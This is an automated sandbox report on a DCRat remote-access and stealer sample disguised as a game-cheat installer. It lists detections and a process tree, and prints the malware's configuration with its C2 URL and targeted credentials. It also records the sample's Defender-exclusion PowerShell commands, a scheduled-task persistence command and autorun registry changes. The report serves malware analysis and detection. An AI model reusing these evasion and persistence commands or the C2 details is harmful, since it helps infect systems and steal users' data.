Windows Analysis Report
uChcvn3L6R.exe

Overview

General Information

Sample name: uChcvn3L6R.exe (renamed because original name is a hash value)
Original sample name: 236b78f3cd3a0b771d318f044dda8f45.exe
Analysis ID: 1447650
MD5: 236b78f3cd3a0b771d318f044dda8f45
SHA1: f890ca2ffb6218fa01df6844fe2a51b184e912b8
SHA256: 8342c29aacd500b5d424822648331736379f18bdb6bc27a7e7a579544570fa8a
Tags: exe, Formbook

Detection

DCRat
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates autostart registry keys to launch java
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Suspicious execution chain found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Process Start Locations
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • uChcvn3L6R.exe (PID: 7060 cmdline: "C:\Users\user\Desktop\uChcvn3L6R.exe" MD5: 236B78F3CD3A0B771D318F044DDA8F45)
    • Arcane CheatSetup.exe (PID: 6432 cmdline: "C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe" MD5: 81E98D594505E0008D35FF1E1D2E4E41)
      • Arcane CheatSetup.tmp (PID: 1860 cmdline: "C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp" /SL5="$4042E,46527891,119296,C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe" MD5: 129B8E200A6E90E813080C9CE0474063)
    • Arcane Cheat.exe (PID: 5780 cmdline: "C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe" MD5: 593631A643AA6AB0AF08189773812E6D)
      • wscript.exe (PID: 5164 cmdline: "C:\Windows\System32\WScript.exe" "C:\Surrogateprovidercomponentsessionmonitor\lEI1Ux7.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 1436 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Surrogateprovidercomponentsessionmonitor\bjWdhUfYhC7CKzpdCHePv6eJ.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • browserwinsvc.exe (PID: 6456 cmdline: "C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe" MD5: E780BB029D808CB41937F4F7CD022B45)
            • schtasks.exe (PID: 2484 cmdline: schtasks.exe /create /tn "qiOZcVoixJLcuAFKAnRdq" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • powershell.exe (PID: 2484 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 6416 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 6272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 2336 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\addins\audiodg.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7196 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\qiOZcVoixJLcuAFKAnRd.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 7260 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\qiOZcVoixJLcuAFKAnRd.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
  • audiodg.exe (PID: 7080 cmdline: C:\Windows\addins\audiodg.exe MD5: E780BB029D808CB41937F4F7CD022B45)
  • audiodg.exe (PID: 3196 cmdline: C:\Windows\addins\audiodg.exe MD5: E780BB029D808CB41937F4F7CD022B45)
  • explorer.exe (PID: 6092 cmdline: C:\Recovery\explorer.exe MD5: E780BB029D808CB41937F4F7CD022B45)
  • explorer.exe (PID: 1196 cmdline: C:\Recovery\explorer.exe MD5: E780BB029D808CB41937F4F7CD022B45)
  • cleanup
{"SCRT": "{\"=\":\"<\",\"z\":\"&\",\"H\":\",\",\"w\":\"@\",\"b\":\"_\",\"D\":\"`\",\"A\":\";\",\"S\":\"!\",\"i\":\"%\",\"E\":\"-\",\"l\":\"*\",\"9\":\"~\",\"W\":\"|\",\"n\":\"#\",\"M\":\" \",\"G\":\")\",\"V\":\">\",\"I\":\".\",\"0\":\"(\",\"O\":\"^\",\"L\":\"$\"}", "PCRT": "{\"Q\":\"`\",\"T\":\"@\",\"U\":\"$\",\"d\":\"(\",\"K\":\")\",\"V\":\"&\",\"B\":\">\",\"Z\":\";\",\"D\":\"#\",\"z\":\"!\",\"L\":\"*\",\"J\":\"|\",\"b\":\",\",\"O\":\"<\",\"k\":\"^\",\"o\":\"-\",\"R\":\" \",\"l\":\"_\",\"F\":\"~\",\"E\":\"%\",\"W\":\".\"}", "TAG": "", "MUTEX": "DCR_MUTEX-9ukBZukGuUbmwPwxZ8oC", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://729231cm.n9shteam1.top/@0J3bwBXdzh2chlnb", "H2": "http://729231cm.n9shteam1.top/@0J3bwBXdzh2chlnb", "T": "0"}
Source | Rule | Description | Author | Strings
00000007.00000002.1869897360.0000000002C04000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000026.00000002.2564245326.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
0000002C.00000002.2426637115.00000000028D1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000007.00000002.1869897360.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000028.00000002.2514657098.0000000002A1F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

            System Summary

            Source: Process started Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\addins\audiodg.exe, CommandLine: C:\Windows\addins\audiodg.exe, CommandLine|base64offset|contains: , Image: C:\Windows\addins\audiodg.exe, NewProcessName: C:\Windows\addins\audiodg.exe, OriginalFileName: C:\Windows\addins\audiodg.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\addins\audiodg.exe, ProcessId: 7080, ProcessName: audiodg.exe
            Source: File created Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe, ProcessId: 6456, TargetFilename: C:\Recovery\RuntimeBroker.exe
            Source: Process started Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe", ParentImage: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe, ParentProcessId: 6456, ParentProcessName: browserwinsvc.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe', ProcessId: 2484, ProcessName: powershell.exe
            Source: Process started Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Windows\addins\audiodg.exe, CommandLine: C:\Windows\addins\audiodg.exe, CommandLine|base64offset|contains: , Image: C:\Windows\addins\audiodg.exe, NewProcessName: C:\Windows\addins\audiodg.exe, OriginalFileName: C:\Windows\addins\audiodg.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\addins\audiodg.exe, ProcessId: 7080, ProcessName: audiodg.exe
            Source: Registry Key set Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe, ProcessId: 6456, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker
            Source: Registry Key set Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe, ProcessId: 6456, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
            Source: Process started Author: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: C:\Windows\addins\audiodg.exe, CommandLine: C:\Windows\addins\audiodg.exe, CommandLine|base64offset|contains: , Image: C:\Windows\addins\audiodg.exe, NewProcessName: C:\Windows\addins\audiodg.exe, OriginalFileName: C:\Windows\addins\audiodg.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\addins\audiodg.exe, ProcessId: 7080, ProcessName: audiodg.exe
            Source: Process started Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Surrogateprovidercomponentsessionmonitor\lEI1Ux7.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Surrogateprovidercomponentsessionmonitor\lEI1Ux7.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe, ParentProcessId: 5780, ParentProcessName: Arcane Cheat.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Surrogateprovidercomponentsessionmonitor\lEI1Ux7.vbe" , ProcessId: 5164, ProcessName: wscript.exe
            Source: Process started Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe", ParentImage: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe, ParentProcessId: 6456, ParentProcessName: browserwinsvc.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe', ProcessId: 2484, ProcessName: powershell.exe
            Timestamp: 05/26/24-10:04:29.664888
            SID: 2850862
            Source Port: 80
            Destination Port: 49738
            Protocol: TCP
            Classtype: A Network Trojan was detected

            AV Detection

            Source: uChcvn3L6R.exe Avira: detected
            Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
            Source: http://729231cm.n9shteam1.top/@0J3bwBXdzh2chlnb Avira URL Cloud: Label: malware
            Source: 00000007.00000002.1914350978.0000000012ABD000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: DCRat (same configuration as shown after the process tree above)
            Source: http://729231cm.n9shteam1.top/@0J3bwBXdzh2chlnb Virustotal: Detection: 14%
            Source: uChcvn3L6R.exe ReversingLabs: Detection: 91%
            Source: uChcvn3L6R.exe Virustotal: Detection: 79%
            Source: Submitted Sample Integrated Neural Analysis Model: Matched 85.4% probability
            Source: uChcvn3L6R.exe Joe Sandbox ML: detected
            Source: uChcvn3L6R.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe Directory created: C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe Directory created: C:\Program Files\Uninstall Information\4f78d385fc35a0
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: uChcvn3L6R.exe, 00000000.00000003.1725594185.0000000004FEE000.00000004.00000020.00020000.00000000.sdmp, Arcane Cheat.exe, 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp, Arcane Cheat.exe, 00000003.00000000.1725425677.0000000000853000.00000002.00000001.01000000.00000008.sdmp, Arcane Cheat.exe, 00000003.00000003.1727874706.00000000072F2000.00000004.00000020.00020000.00000000.sdmp, Arcane Cheat.exe, 00000003.00000003.1726951934.00000000069E7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb source: is-LS3UA.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnpt\npt.pdbY" source: is-O5MSC.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb'% source: is-LS3UA.tmp.2.dr
            Source: Binary string: msvcr120.i386.pdb source: is-11A56.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnpt\npt.pdb source: is-O5MSC.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\unpackexe\unpack200.pdb source: is-RMB9M.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libverify\verify.pdb source: is-G1B5Q.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libhprof_jvmti\hprof.pdb source: is-069DQ.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libhprof_jvmti\hprof.pdbi source: is-069DQ.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: is-DLMB6.tmp.2.dr
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe Code function: 3_2_0082A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,3_2_0082A5F4
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe Code function: 3_2_0083B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,3_2_0083B8E0

            Software Vulnerabilities

            Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            Networking

            Source: Traffic Snort IDS: 2850862 ETPRO TROJAN DCRat Initial Checkin Server Response M4 104.21.22.205:80 -> 192.168.2.4:49738
            Source: Malware configuration extractor URLs: http://729231cm.n9shteam1.top/@0J3bwBXdzh2chlnb
            Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
            Source: Joe Sandbox View IP Address: 208.95.112.1
            Source: Joe Sandbox View ASN Name: TUT-ASUS
            Source: unknown DNS query: name: ip-api.com
            Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic DNS traffic detected: DNS query: ip-api.com

            System Summary

            Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe Code function: 3_2_0082718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe File created: C:\Windows\addins\audiodg.exe
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe File created: C:\Windows\addins\42af1c969fbb7b
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe File created: C:\Windows\Fonts\qiOZcVoixJLcuAFKAnRd.exe
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe File created: C:\Windows\Fonts\4f78d385fc35a0
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe File created: C:\Windows\en-US\qiOZcVoixJLcuAFKAnRd.exe
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe File created: C:\Windows\en-US\4f78d385fc35a0
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe Code function: String function: 0083E28C appears 35 times
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe Code function: String function: 0083E360 appears 52 times
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe Code function: String function: 0083ED00 appears 31 times
            Source: uChcvn3L6R.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
            Source: uChcvn3L6R.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
            Source: Arcane CheatSetup.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
            Source: Arcane CheatSetup.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
            Source: uChcvn3L6R.exe, 00000000.00000003.1725594185.0000000004FEE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs uChcvn3L6R.exe
            Source: uChcvn3L6R.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, OPGpF4YRttobaOjLnpx.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, OPGpF4YRttobaOjLnpx.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, TqIR1IaX6SfDv216AUp.cs Cryptographic APIs: 'TransformBlock'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, TqIR1IaX6SfDv216AUp.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, OPGpF4YRttobaOjLnpx.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, OPGpF4YRttobaOjLnpx.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, TqIR1IaX6SfDv216AUp.cs Cryptographic APIs: 'TransformBlock'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, TqIR1IaX6SfDv216AUp.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, b5hTDFeLD6bE2HAfhlF.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, b5hTDFeLD6bE2HAfhlF.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, b5hTDFeLD6bE2HAfhlF.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, b5hTDFeLD6bE2HAfhlF.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine Classification label: mal92.troj.expl.evad.winEXE@41/475@1/1
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe Code function: 3_2_00826EC9 GetLastError,FormatMessageW
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe Code function: 3_2_00839E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp File created: C:\Program Files (x86)\Arcane Cheat
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp File created: C:\Users\user\AppData\Local\Programs
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\2f1bb18a36a2997857c610994e6b82f6ce779022
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_03
            Source: C:\Users\user\Desktop\uChcvn3L6R.exe File created: C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe
            Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Surrogateprovidercomponentsessionmonitor\bjWdhUfYhC7CKzpdCHePv6eJ.bat" "
            Source: unknown Process created: C:\Recovery\explorer.exe
            Source: unknown Process created: C:\Recovery\explorer.exe
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe Command line argument: sfxname 3_2_0083D5D4
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe Command line argument: sfxstime 3_2_0083D5D4
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe Command line argument: STARTDLG 3_2_0083D5D4
            Source: C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: uChcvn3L6R.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.91%
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (entry repeated 30 times)
            Source: C:\Users\user\Desktop\uChcvn3L6R.exe File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\uChcvn3L6R.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
            Source: uChcvn3L6R.exe ReversingLabs: Detection: 91%
            Source: uChcvn3L6R.exe Virustotal: Detection: 79%
            Source: uChcvn3L6R.exe String found in binary or memory: /LOADINF="filename"
            Source: unknown Process created: C:\Users\user\Desktop\uChcvn3L6R.exe "C:\Users\user\Desktop\uChcvn3L6R.exe"
            Source: C:\Users\user\Desktop\uChcvn3L6R.exe Process created: C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe "C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe"
            Source: C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe Process created: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp "C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp" /SL5="$4042E,46527891,119296,C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe"
            Source: C:\Users\user\Desktop\uChcvn3L6R.exe Process created: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe "C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe"
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Surrogateprovidercomponentsessionmonitor\lEI1Ux7.vbe"
            Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Surrogateprovidercomponentsessionmonitor\bjWdhUfYhC7CKzpdCHePv6eJ.bat" "
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe "C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe"
